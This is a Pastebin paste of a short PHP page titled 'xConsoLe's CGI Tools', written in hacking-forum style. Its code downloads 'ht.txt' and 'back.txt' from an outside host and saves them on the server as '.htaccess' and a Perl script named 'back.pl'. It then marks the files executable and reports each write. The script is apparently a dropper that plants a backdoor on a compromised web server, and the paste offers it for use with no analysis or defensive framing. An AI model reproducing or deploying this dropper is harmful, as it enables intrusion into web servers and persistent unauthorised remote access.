Advertisement
4c1d-burn

cgi.php

Jan 3rd, 2012
144
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.99 KB | None | 0 0
  1. <html>
  2. <title>xConsoLe's CGI Tools</title>
  3. <style>
  4. background:black url('http://cdn.hackforums.net/images/blackreign/bg.png');
  5. a:link {text-decoration:none;}
  6. a:hover {
  7. border-bottom: 1px dashed #ba0000;
  8. }
  9. a:visited {text-decoration:none;}
  10. </style>
  11. <body text="#FF0000" bgcolor="#000000" link="#CCCCCC" vlink="#808080" alink="#999999">
  12. <font face="Tahoma" size="1" color="#f30000"><br><b>
  13.  
  14. <?
  15. @set_time_limit(0);
  16. @error_reporting(E_ALL | E_NOTICE);
  17.  
  18. $x=array(
  19. "ht.txt"=>".htaccess",
  20. "back.txt"=>"back.pl",
  21. );
  22.  
  23. foreach($x as $d=>$z){
  24.  
  25. $file = fopen($z ,"w+");
  26.  
  27. $sa=file_get_contents('http://expertisepc.com/df/me/'.$d);
  28.  
  29. $write = fwrite ($file ,$sa);
  30.  
  31. fclose($file);
  32.  
  33. if($write){ echo "[+] Writed : <a href='./$z'>$z</a> </br>"; }else{ echo "[~] Can't Write : $z <br>"; }
  34.  
  35. chmod($z , 0755);
  36.  
  37. }
  38. ?>
  39. </b>
  40. </font><b>
  41. <font face="Tahoma" size="2" color="#CCCCCC">
  42. </font><font face="Tahoma" size="2" color="#999999">
  43. <!-- /xC?-->
  44.  
  45. DoNE !</font>
  46. </br>
  47. </b>
  48. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement